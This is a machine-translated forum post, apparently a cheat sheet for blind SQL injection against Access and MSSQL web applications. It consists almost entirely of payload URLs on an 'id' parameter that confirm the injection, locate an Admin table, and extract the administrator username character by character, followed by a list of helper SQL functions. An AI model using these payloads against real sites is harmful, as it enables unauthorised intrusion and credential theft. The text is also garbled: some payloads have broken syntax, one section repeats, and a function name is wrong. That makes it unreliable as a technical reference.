Article Source: http://blog.powers.com.cn/forum_posts.asp? Tid = 333 & Pn = 4
Author: YJD
□Detect whether injection can be performed
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and 1 = 1 (normal page)
Http: // URL/XX? Id = 1111 and 1 = 2 (error page)
========================================================== ==============================================
□Detection Table Section
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select * from Admin)
========================================================== ==============================================
□Check Field
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select username from Admin)
========================================================== ==============================================
□Detection ID
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where id = 1)
========================================================== ==============================================
□Check Length
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where Len (username) = 5 and ID = 1)
========================================================== ==============================================
□Check Length
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where Len (username) = 5 and ID = 1)
========================================================== ==============================================
□Check whether the database is MSSQL
========================================================== ==============================================
Http: // URL/XX? Id = 1111 and exists (select * From sysobjects)
========================================================== ==============================================
□Check whether it is in English
========================================================== ==============================================
(Access database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where ASC (mid (username, 130) between 30 and ID = 1)
(MSSQL database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where Unicode (substring (username, 130) between 30 and ID = 1)
========================================================== ==============================================
□Check the English Scope
========================================================== ==============================================
(Access database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where ASC (mid (username, 100) between 90 and ID = 1)
(MSSQL database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where Unicode (substring (username, 100) between 90 and ID = 1)
========================================================== ==============================================
□Check the character
========================================================== ==============================================
(Access database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where ASC (mid (username,) = 97 and ID = 1)
(MSSQL database)
Http: // URL/XX? Id = 1111 and exists (select ID from Admin where Unicode (substring (username,) = 97 and ID = 1)
========================================================== ========================================================
Common functions
========================================================== ========================================================
Access: ASC (character) sqlserver: Unicode (character)
Purpose: return the ASCII code of a character.
Access: CHR (number) sqlserver: nchar (number)
Function: opposite to ASC, returns Characters Based on the ASCII code.
Access: Mid (string, n, l) sqlserver: substring (string, N, L)
Purpose: return the substring of the string that starts from n characters and ranges from N to N + L.
Access: ABC (number) sqlserver: ABC (number)
Purpose: return the absolute value of a number (used to guess Chinese characters)
Access: A between B and C sqlserver: A between B and C
Purpose: Determine whether a is between B and C.